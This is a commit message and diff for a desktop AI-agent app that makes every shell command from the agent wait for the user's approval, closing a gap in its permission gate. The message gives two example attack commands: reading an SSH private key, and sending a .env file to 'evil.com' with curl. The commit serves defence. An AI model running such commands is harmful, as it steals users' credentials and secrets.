fix(security): require user permission before run_command executes

ToolExecutor::run_command was bypassing the path-based permission gate,
since AgentRunner::emit_permission_request_if_needed only triggered for
tools that include a "path" input. Shell commands could therefore read
or exfiltrate sensitive files (cat ~/.ssh/id_rsa, curl evil.com -d @../.env)
without ever prompting the user, undermining the sandbox hardening that
landed in PR #21.

- runner.rs: add a run_command branch that registers a permission request
  with permission_type "shell_command" and reuses the existing path field
  to display the command text.
- types/index.ts, AppShell.tsx: extend PermissionRequest type with the new
  variant.
- PermissionDialog.tsx: render a clear "wants to run a shell command"
  message for the new type.

Behavior is now: every shell command requires explicit user approval,
matching the existing UX for sensitive file and outside-sandbox access.

Author: kevinnft

src-tauri/src/agents/runner.rs

@@ -1007,6 +1007,27 @@ impl AgentRunner {
         executor: &ToolExecutor,
         tool_call: &ParsedToolCall,
     ) -> Option<oneshot::Receiver<bool>> {
+        if tool_call.name == "run_command" {
+            let command = tool_call
+                .input
+                .get("command")
+                .and_then(Value::as_str)
+                .map(std::string::ToString::to_string)?;
+
+            let rx = self.permissions.register(agent_run_id.to_string());
+
+            let _ = self.app_handle.emit(
+                "agent-permission-request",
+                AgentPermissionRequestEvent {
+                    agent_run_id: agent_run_id.to_string(),
+                    permission_type: "shell_command".to_string(),
+                    path: command,
+                    agent_type: agent_type.to_string(),
+                },
+            );
+            return Some(rx);
+        }
+
         let path = tool_call
             .input
             .get("path")

src/components/chat/PermissionDialog.tsx

@@ -31,6 +31,11 @@ export function PermissionDialog({ request, onAllow, onDeny }: PermissionDialogP
               Agent <span className="font-semibold text-[var(--text)]">{agentLabel}</span> wants to access a path outside the project:
             </>
           )}
+          {request.type === 'shell_command' && (
+            <>
+              Agent <span className="font-semibold text-[var(--text)]">{agentLabel}</span> wants to run a shell command:
+            </>
+          )}
           <br />
           <span className="inline-block mt-2 font-mono text-xs bg-[var(--surface-2)] px-2 py-1 rounded border border-[var(--border)] break-all">
             {request.path}

src/components/layout/AppShell.tsx

@@ -309,7 +309,7 @@ export const AppShell: React.FC = () => {
 
       const unlistenPermission = await listen<{
         agentRunId: string;
-        type: 'sensitive_file' | 'outside_sandbox';
+        type: 'sensitive_file' | 'outside_sandbox' | 'shell_command';
         path: string;
         agentType: string;
       }>('agent-permission-request', (event) => {

src/types/index.ts

@@ -123,7 +123,7 @@ export interface AgentRunWithTools extends AgentRun {
 }
 
 export interface PermissionRequest {
-  type: 'sensitive_file' | 'outside_sandbox';
+  type: 'sensitive_file' | 'outside_sandbox' | 'shell_command';
   path: string;
   agentType: AgentType;
   agentRunId: string;